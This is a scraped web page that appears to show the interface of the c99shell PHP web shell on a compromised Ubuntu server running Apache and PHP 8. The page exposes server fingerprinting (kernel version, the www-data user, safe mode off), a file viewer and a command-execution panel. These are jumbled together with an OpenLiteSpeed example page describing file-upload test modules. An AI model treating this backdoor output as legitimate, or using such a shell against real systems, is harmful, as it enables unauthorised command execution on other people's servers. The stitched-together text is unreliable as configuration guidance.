Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /usr/local/lsws/Example/html/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
To enable optional module modreqparserAdd the following to the <ols_home>/conf/http_config.conf file:module modreqparser and ensure that uploadpassbypath is set to enabled (Enabled by default). To enable optional module uploadprogressAdd the following to the <ols_home>/conf/http_config.conf file:module uploadprogress and add the below setting to the <ols_home>/conf/vhosts/Example/vhconf.conf file: context /progress/ { type module handler uploadprogress } 0%
|
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]-- |
This page is designed to test the file upload feature and it's related optional modules.
These optional modules include 'modreqparser', which can be used to optimize file upload to pass the path of uploaded files instead of their contents, and 'uploadprogress', which can be used to display a progress bar for the current file upload.
If context "/progress" is set to be handled by the "uploadprogress" module, then the progress request for this file will work as intended, displaying a working progress bar.